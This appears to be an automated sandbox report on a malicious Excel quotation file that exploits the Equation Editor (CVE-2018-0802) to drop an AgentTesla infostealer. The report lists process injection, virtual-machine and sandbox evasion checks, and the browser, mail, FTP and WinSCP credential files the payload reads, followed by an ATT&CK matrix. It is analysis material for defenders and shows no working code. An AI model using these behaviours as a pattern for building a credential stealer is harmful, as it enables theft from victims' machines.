Source: C:\Users\Public\Regasm_svchost.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: mon[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Regasm_svchost.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Quotation - Optical Eyeglasses.xlsx	Virustotal: Detection: 35%
Source: Quotation - Optical Eyeglasses.xlsx	ReversingLabs: Detection: 31%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"
Source: C:\Users\Public\Regasm_svchost.exe	Process created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe	Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\Regasm_svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Quotation - Optical Eyeglasses.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR692D.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/23@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: 6.0.Regasm_svchost.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Regasm_svchost.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe	Code function: 5_2_00A44FB3 push ebp; ret	5_2_00A44FB9
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_003D03E2 pushfd ; retf 0017h	6_2_003D0421
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_003D2591 pushfd ; retf 0017h	6_2_003D2595
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_00627328 push eax; retf	6_2_006273B1
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_006273C0 pushad ; retf	6_2_00627401

Source: initial sample	Static PE information: section name: .text entropy: 7.741618830897132
Source: initial sample	Static PE information: section name: .text entropy: 7.741618830897132

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\Regasm_svchost.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_033F0517

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\Regasm_svchost.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\Regasm_svchost.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Regasm_svchost.exe, 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Regasm_svchost.exe, 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\Regasm_svchost.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\Public\Regasm_svchost.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2056	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 2820	Thread sleep time: -45877s >= -30000s	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 2956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 1412	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436	Thread sleep time: -510000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 2088	Thread sleep count: 9428 > 30	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436	Thread sleep count: 53 > 30	Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe

Window / User API: threadDelayed 9428

Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\Regasm_svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\Public\Regasm_svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe	Thread delayed: delay time: 45877	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_2-519
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_2-544

Source: EQNEDT32.EXE, 00000002.00000002.980447357.00000000005DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[I
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: EQNEDT32.EXE, 00000002.00000002.980394637.00000000005A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\Regasm_svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_033F05E2 mov edx, dword ptr fs:[00000030h]

2_2_033F05E2

Source: C:\Users\Public\Regasm_svchost.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\Public\Regasm_svchost.exe

Memory written: C:\Users\Public\Regasm_svchost.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"			Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Process created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe			Jump to behavior

Source: C:\Users\Public\Regasm_svchost.exe	Queries volume information: C:\Users\Public\Regasm_svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Queries volume information: C:\Users\Public\Regasm_svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Regasm_svchost.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\Regasm_svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\Regasm_svchost.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Regasm_svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match	File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	Path Interception	111 Process Injection	111 Masquerading	2 OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	33 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	22 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	21 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Scripting	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	114 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	3 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation - Optical Eyeglasses.xlsx	35%	Virustotal		Browse
Quotation - Optical Eyeglasses.xlsx	32%	ReversingLabs	Document-Office.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner	Label	Link
